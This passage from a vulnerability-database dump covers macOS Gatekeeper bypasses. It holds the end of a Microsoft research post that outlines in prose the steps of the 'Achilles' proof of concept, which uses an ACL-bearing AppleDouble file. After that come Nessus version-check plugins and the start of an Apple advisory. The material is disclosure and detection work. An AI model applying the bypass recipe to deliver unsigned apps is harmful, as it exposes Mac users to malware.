[_acl_to_text_](<https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/acl_to_text.3.html>) API and saving the ACL with the correct format.\n * When using the _ditto_ utility, the _com.apple.acl.text_ extended attribute is lost in the resulting AppleDouble file. This can be overcome by either manually creating the binary AppleDouble or, as we chose in this case, simply patching the resulting AppleDouble file before archiving it.\n\nTherefore, our POC is as follows:\n\n 1. Create a fake directory structure with an arbitrary icon and payload.\n 2. Create an AppleDouble file with the _com.apple.acl.text_ extended attribute key and a value that represents a restrictive ACL (we chose the equivalent of \u201c_everyone deny write,writeattr,writeextattr,writesecurity,chown_\u201d). Perform the correct AppleDouble patching if using _ditto_ to generate the AppleDouble file.\n 3. Create an archive with the application alongside its AppleDouble file and host it on a web server.\n\nWe named our POC exploit Achilles after its use of ACLs to bypass Gatekeeper. Our POC recorded video can be viewed here:\n\nThe AppleDouble file we used for this Gatekeeper bypass can be generated, as displayed below:\n\n![Graphical user interface; text](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-8.-Generic-AppleDouble-file-that-can-be-used-for-any-Gatekeeper-bypass.png)Figure 8. Generic AppleDouble file that can be used for any Gatekeeper bypass\n\n## Improving security for all through research and threat intelligence sharing\n\nThe threat landscape continues to evolve, delivering new threats and attack capabilities that take advantage of unpatched vulnerabilities and misconfigurations as a vector to access systems and data. Our data shows that fake apps remain one of the top entry vectors on macOS, indicating Gatekeeper bypass techniques are an attractive and even a necessary capability for adversaries to leverage in attacks. Nonetheless, through research-driven protections and collaboration with customers, partners, and industry experts, we strive to enrich our protection technologies to defend against such issues\u2014regardless of the platform or device in use.\n\nAs environments continue to rely on a diverse range of devices and operating systems, organizations need security solutions that can provide protection across platforms and a complete picture of their security posture. Collaborative research such as this informs our comprehensive protection capabilities across platforms, allowing [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-endpoint?rtc=1>) to deliver and coordinate threat defense across all major OS platforms including Windows, macOS, Linux, Android, and iOS. On macOS devices, Microsoft Defender for Endpoint detects and exposes threats and vulnerabilities, including CVE-2022-42821, using antivirus, endpoint detection and response (EDR), and threat and vulnerability management capabilities. This research also improved [Microsoft Defender\u2019s Vulnerability Management](<https://docs.microsoft.com/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management-capabilities?view=o365-worldwide>) capabilities to discover, prioritize, and remediate misconfigurations and vulnerabilities. This includes detecting CVE-2022-42821 on [macOS devices](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-mac?view=o365-worldwide>) by examining AppleDouble files misusing ACLs.\n\nThis case also emphasized the need for responsible vulnerability disclosures and expert, cross-platform collaboration to effectively mitigate issues, protecting users against present and future threats. We wish to again thank the Apple product security team for their efforts and responsiveness in addressing the issue.\n\n![Microsoft Defender for Endpoint detecting and preventing an AppleDouble file](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Figure-9.-Microsoft-Defender-for-Endpoint-preventing-the-vulnerability.png)Figure 9. Detection by Microsoft Defender for Endpoint\n\nOur Microsoft security researchers continue to discover new threats and vulnerabilities as part of our effort to secure users\u2019 computing experiences, be it a Windows or non-Windows device. In the effort to improve security for all, we will continue to share intelligence and work with the security community to create and improve upon solutions that protect users and organizations across platforms every single day.\n\n**Jonathan Bar Or**\n\nMicrosoft 365 Defender Research Team\n\nThe post [Gatekeeper\u2019s Achilles heel: Unearthing a macOS vulnerability](<https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-12-19T18:00:00", "type": "mssecure", "title": "Gatekeeper\u2019s Achilles heel: Unearthing a macOS vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8826", "CVE-2019-8656", "CVE-2021-1810", "CVE-2021-30657", "CVE-2021-30853", "CVE-2022-22616", "CVE-2022-26706", "CVE-2022-42821"], "modified": "2022-12-19T18:00:00", "id": "MSSECURE:447DB6FB8D54C72486ECF54472FDAD42", "href": "https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "nessus": [{"lastseen": "2023-01-21T23:03:18", "description": "The remote host is running a version of macOS / Mac OS X that is prior to Catalina Security Update 2022-003 Catalina. It is, therefore, affected by multiple vulnerabilities :\n\n - An application may be able to gain elevated privileges (CVE-2022-22617, CVE-2022-22631)\n\n - An application may be able to read restricted memory (CVE-2022-22648)\n\n - Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory (CVE-2022-22625, CVE-2022-22626, CVE-2022-22627)\n\n - Processing a maliciously crafted file may lead to arbitrary code execution (CVE-2022-22597)\n\n - A maliciously crafted ZIP archive may bypass Gatekeeper checks (CVE-2022-22616)\n\n - An application may be able to execute arbitrary code with kernel privileges (CVE-2022-22613, CVE-2022-22614, CVE-2022-22615, CVE-2022-22661)\n\n - An attacker in a privileged position may be able to perform a denial of service attack (CVE-2022-22638)\n\n - A person with access to a Mac may be able to bypass Login Window (CVE-2022-22647)\n\n - A local attacker may be able to view the previous logged in user's desktop from the fast user switching screen (CVE-2022-22656)\n\n - A plug-in may be able to inherit the application's permissions and access user data (CVE-2022-22650)\n\n - Processing maliciously crafted web content may disclose sensitive user information (CVE-2022-22662)\n\n - A local user may be able to write arbitrary files (CVE-2022-22582)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported version number.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-16T00:00:00", "type": "nessus", "title": "macOS 10.15.x < Catalina Security Update 2022-003 Catalina (HT213185)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22582", "CVE-2022-22597", "CVE-2022-22613", "CVE-2022-22614", "CVE-2022-22615", "CVE-2022-22616", "CVE-2022-22617", "CVE-2022-22625", "CVE-2022-22626", "CVE-2022-22627", "CVE-2022-22631", "CVE-2022-22638", "CVE-2022-22647", "CVE-2022-22648", "CVE-2022-22650", "CVE-2022-22656", "CVE-2022-22661", "CVE-2022-22662"], "modified": "2022-11-08T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_HT213185.NASL", "href": "https://www.tenable.com/plugins/nessus/158976", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158976);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/11/08\");\n\n script_cve_id(\n \"CVE-2022-22582\",\n \"CVE-2022-22597\",\n \"CVE-2022-22613\",\n \"CVE-2022-22614\",\n \"CVE-2022-22615\",\n \"CVE-2022-22616\",\n \"CVE-2022-22617\",\n \"CVE-2022-22625\",\n \"CVE-2022-22626\",\n \"CVE-2022-22627\",\n \"CVE-2022-22631\",\n \"CVE-2022-22638\",\n \"CVE-2022-22647\",\n \"CVE-2022-22648\",\n \"CVE-2022-22650\",\n \"CVE-2022-22656\",\n \"CVE-2022-22661\",\n \"CVE-2022-22662\"\n );\n script_xref(name:\"APPLE-SA\", value:\"HT213185\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2022-03-14-6\");\n script_xref(name:\"IAVA\", value:\"2022-A-0118-S\");\n\n script_name(english:\"macOS 10.15.x < Catalina Security Update 2022-003 Catalina (HT213185)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS or Mac OS X security update or supplemental update that fixes multiple\nvulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is prior to Catalina Security Update 2022-003\nCatalina. It is, therefore, affected by multiple vulnerabilities :\n\n - An application may be able to gain elevated privileges (CVE-2022-22617, CVE-2022-22631)\n\n - An application may be able to read restricted memory (CVE-2022-22648)\n\n - Processing a maliciously crafted AppleScript binary may result in unexpected application termination or\n disclosure of process memory (CVE-2022-22625, CVE-2022-22626, CVE-2022-22627)\n\n - Processing a maliciously crafted file may lead to arbitrary code execution (CVE-2022-22597)\n\n - A maliciously crafted ZIP archive may bypass Gatekeeper checks (CVE-2022-22616)\n\n - An application may be able to execute arbitrary code with kernel privileges (CVE-2022-22613,\n CVE-2022-22614, CVE-2022-22615, CVE-2022-22661)\n\n - An attacker in a privileged position may be able to perform a denial of service attack (CVE-2022-22638)\n\n - A person with access to a Mac may be able to bypass Login Window (CVE-2022-22647)\n\n - A local attacker may be able to view the previous logged in user's desktop from the fast user switching\n screen (CVE-2022-22656)\n\n - A plug-in may be able to inherit the application's permissions and access user data (CVE-2022-22650)\n\n - Processing maliciously crafted web content may disclose sensitive user information (CVE-2022-22662)\n\n - A local user may be able to write arbitrary files (CVE-2022-22582)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported\nversion number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT213185\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS 10.15.x Catalina Security Update 2022-003 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22597\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'macOS Gatekeeper check bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_ports(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude('vcf_extras_apple.inc');\n\nvar app_info = vcf::apple::macos::get_app_info();\n\nvar constraints = [\n {\n 'min_version': '10.15',\n 'max_version': '10.15.7',\n 'fixed_build' : '19H1824',\n 'fixed_display': 'Catalina 10.15.7 Security Update 2022-003'\n }\n];\n\nvcf::apple::macos::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-22T04:24:56", "description": "The remote host is running a version of macOS / Mac OS X that is 11.x prior to 11.6.5 Big Sur. It is, therefore, affected by multiple vulnerabilities including the following:\n\n - Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution. (CVE-2022-22633)\n\n - Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory. (CVE-2022-22626, CVE-2022-22627)\n\n - A local attacker may be able to view the previous logged in user's desktop from the fast user switching screen. (CVE-2022-22579)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-21T00:00:00", "type": "nessus", "title": "macOS 11.x < 11.6.5 Multiple Vulnerabilities (HT213184)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22579", "CVE-2022-22582", "CVE-2022-22597", "CVE-2022-22599", "CVE-2022-22613", "CVE-2022-22614", "CVE-2022-22615", "CVE-2022-22616", "CVE-2022-22617", "CVE-2022-22625", "CVE-2022-22626", "CVE-2022-22627", "CVE-2022-22631", "CVE-2022-22632", "CVE-2022-22633", "CVE-2022-22638", "CVE-2022-22647", "CVE-2022-22648", "CVE-2022-22650", "CVE-2022-22656", "CVE-2022-22661", "CVE-2022-22662"], "modified": "2022-11-08T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_HT213184.NASL", "href": "https://www.tenable.com/plugins/nessus/159105", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159105);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/11/08\");\n\n script_cve_id(\n \"CVE-2022-22582\",\n \"CVE-2022-22597\",\n \"CVE-2022-22599\",\n \"CVE-2022-22613\",\n \"CVE-2022-22614\",\n \"CVE-2022-22615\",\n \"CVE-2022-22616\",\n \"CVE-2022-22617\",\n \"CVE-2022-22625\",\n \"CVE-2022-22626\",\n \"CVE-2022-22627\",\n \"CVE-2022-22631\",\n \"CVE-2022-22632\",\n \"CVE-2022-22633\",\n \"CVE-2022-22638\",\n \"CVE-2022-22647\",\n \"CVE-2022-22648\",\n \"CVE-2022-22650\",\n \"CVE-2022-22656\",\n \"CVE-2022-22661\",\n \"CVE-2022-22662\"\n );\n script_xref(name:\"APPLE-SA\", value:\"HT213184\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2022-03-14-5\");\n script_xref(name:\"IAVA\", value:\"2022-A-0118-S\");\n\n script_name(english:\"macOS 11.x < 11.6.5 Multiple Vulnerabilities (HT213184)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is 11.x prior to 11.6.5 Big Sur. It is, therefore,\naffected by multiple vulnerabilities including the following:\n\n - Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code\n execution. (CVE-2022-22633)\n\n - Processing a maliciously crafted AppleScript binary may result in unexpected application termination or\n disclosure of process memory. (CVE-2022-22626, CVE-2022-22627)\n\n - A local attacker may be able to view the previous logged in user's desktop from the fast user switching\n screen. (CVE-2022-22579)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported\nversion number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT213184\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS 11.6.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22661\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-22632\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'macOS Gatekeeper check bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/local_checks_enabled\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude('vcf_extras_apple.inc');\n\nvar app_info = vcf::apple::macos::get_app_info();\nvar constraints = [{ 'min_version' : '11.0', 'fixed_version' : '11.6.5', 'fixed_display' : 'macOS Big Sur 11.6.5' }];\n\nvcf::apple::macos::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-10T19:19:28", "description": "The remote host is running a version of macOS / Mac OS X that is 12.x prior to 12.3 Monterey. It is, therefore, affected by multiple vulnerabilities, including the following:\n - A use after free issue was addressed with improved memory management. Successful exploitation could result in arbitrary code execution with kernel privileges (CVE-2022-22614). \n\n - A logic issue was addressed with improved state management. Successful exploitation could result in privilege escalation (CVE-2022-22632).\n\n - A null pointer dereference was addressed with improved validation. Successful exploitation could result in a denial of service condition. (CVE-2022-22638).\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-21T00:00:00", "type": "nessus", "title": "macOS 12.x < 12.3 (HT213183)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22945", "CVE-2021-22946", "CVE-2021-22947", "CVE-2021-36976", "CVE-2021-4136", "CVE-2021-4166", "CVE-2021-4173", "CVE-2021-4187", "CVE-2021-4192", "CVE-2021-4193", "CVE-2021-46059", "CVE-2022-0128", "CVE-2022-0156", "CVE-2022-0158", "CVE-2022-22582", "CVE-2022-22597", "CVE-2022-22599", "CVE-2022-22600", "CVE-2022-22609", "CVE-2022-22610", "CVE-2022-22611", "CVE-2022-22612", "CVE-2022-22613", "CVE-2022-22614", "CVE-2022-22615", "CVE-2022-22616", "CVE-2022-22617", "CVE-2022-22621", "CVE-2022-22623", "CVE-2022-22624", "CVE-2022-22625", "CVE-2022-22626", "CVE-2022-22627", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22631", "CVE-2022-22632", "CVE-2022-22633", "CVE-2022-22637", "CVE-2022-22638", "CVE-2022-22639", "CVE-2022-22640", "CVE-2022-22641", "CVE-2022-22643", "CVE-2022-22644", "CVE-2022-22647", "CVE-2022-22648", "CVE-2022-22650", "CVE-2022-22651", "CVE-2022-22656", "CVE-2022-22657", "CVE-2022-22660", "CVE-2022-22661", "CVE-2022-22662", "CVE-2022-22664", "CVE-2022-22665", "CVE-2022-22668", "CVE-2022-22669"], "modified": "2022-12-15T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_HT213183.NASL", "href": "https://www.tenable.com/plugins/nessus/159106", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159106);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/15\");\n\n script_cve_id(\n \"CVE-2021-4136\",\n \"CVE-2021-4166\",\n \"CVE-2021-4173\",\n \"CVE-2021-4187\",\n \"CVE-2021-4192\",\n \"CVE-2021-4193\",\n \"CVE-2021-22945\",\n \"CVE-2021-22946\",\n \"CVE-2021-22947\",\n \"CVE-2021-36976\",\n \"CVE-2021-46059\",\n \"CVE-2022-0128\",\n \"CVE-2022-0156\",\n \"CVE-2022-0158\",\n \"CVE-2022-22582\",\n \"CVE-2022-22597\",\n \"CVE-2022-22599\",\n \"CVE-2022-22600\",\n \"CVE-2022-22609\",\n \"CVE-2022-22610\",\n \"CVE-2022-22611\",\n \"CVE-2022-22612\",\n \"CVE-2022-22613\",\n \"CVE-2022-22614\",\n \"CVE-2022-22615\",\n \"CVE-2022-22616\",\n \"CVE-2022-22617\",\n \"CVE-2022-22621\",\n \"CVE-2022-22623\",\n \"CVE-2022-22624\",\n \"CVE-2022-22625\",\n \"CVE-2022-22626\",\n \"CVE-2022-22627\",\n \"CVE-2022-22628\",\n \"CVE-2022-22629\",\n \"CVE-2022-22631\",\n \"CVE-2022-22632\",\n \"CVE-2022-22633\",\n \"CVE-2022-22637\",\n \"CVE-2022-22638\",\n \"CVE-2022-22639\",\n \"CVE-2022-22640\",\n \"CVE-2022-22641\",\n \"CVE-2022-22643\",\n \"CVE-2022-22644\",\n \"CVE-2022-22647\",\n \"CVE-2022-22648\",\n \"CVE-2022-22650\",\n \"CVE-2022-22651\",\n \"CVE-2022-22656\",\n \"CVE-2022-22657\",\n \"CVE-2022-22660\",\n \"CVE-2022-22661\",\n \"CVE-2022-22662\",\n \"CVE-2022-22664\",\n \"CVE-2022-22665\",\n \"CVE-2022-22668\",\n \"CVE-2022-22669\"\n );\n script_xref(name:\"APPLE-SA\", value:\"HT213183\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2022-03-14-4\");\n script_xref(name:\"IAVA\", value:\"2022-A-0118-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0442-S\");\n\n script_name(english:\"macOS 12.x < 12.3 (HT213183)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is 12.x prior to 12.3 Monterey. It is, therefore,\naffected by multiple vulnerabilities, including the following:\n \n - A use after free issue was addressed with improved memory management. Successful exploitation could \n result in arbitrary code execution with kernel privileges (CVE-2022-22614). \n\n - A logic issue was addressed with improved state management. Successful exploitation could result in\n privilege escalation (CVE-2022-22632).\n\n - A null pointer dereference was addressed with improved validation. Successful exploitation could \n result in a denial of service condition. (CVE-2022-22638).\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported\nversion number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-gb/HT213183\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS 12.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22665\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-22641\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'macOS Gatekeeper check bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/local_checks_enabled\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude('vcf_extras_apple.inc');\n\nvar app_info = vcf::apple::macos::get_app_info();\nvar constraints = [\n {\n 'min_version': '12.0', \n 'fixed_version': '12.3', \n 'fixed_display': 'macOS Monterey 12.3'\n }\n];\n\nvcf::apple::macos::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "apple": [{"lastseen": "2022-11-18T14:56:55", "description": "# About the security content of Security Update 2022-003 Catalina\n\nThis document describes the security content of Security Update 2022-003 Catalina.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## Security Update 2022-003 Catalina\n\nReleased March 14, 2022\n\n**AppKit**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious application may be able to gain root privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2022-22665: Lockheed Martin Red Team\n\nEntry added May 25, 